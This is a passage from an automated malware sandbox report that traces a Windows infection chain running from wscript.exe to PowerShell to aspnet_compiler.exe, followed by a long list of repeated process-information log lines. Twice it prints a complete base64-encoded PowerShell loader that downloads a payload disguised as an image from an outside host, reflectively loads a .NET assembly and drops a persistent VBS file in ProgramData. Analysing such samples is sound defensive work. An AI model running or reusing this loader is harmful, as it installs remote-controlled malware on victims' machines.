                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologicallyJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologicallyJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,21_2_0041BCE3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 15_2_02EACA84 push es; retf 15_2_02EACA91
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004567E0 push eax; ret 21_2_004567FE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0045B9DD push esi; ret 21_2_0045B9E6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00455EAF push ecx; ret 21_2_00455EC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00433FF6 push ecx; ret 21_2_00434009

                        Persistence and Installation Behavior

                        barindex
                        Command shell drops VBS files
                        Source: C:\Windows\System32\cmd.exeFile created: C:\ProgramData\haematachometer.vbsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00406128 ShellExecuteW,URLDownloadToFileW,21_2_00406128
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,21_2_00419BC4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,21_2_0041BCE3
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
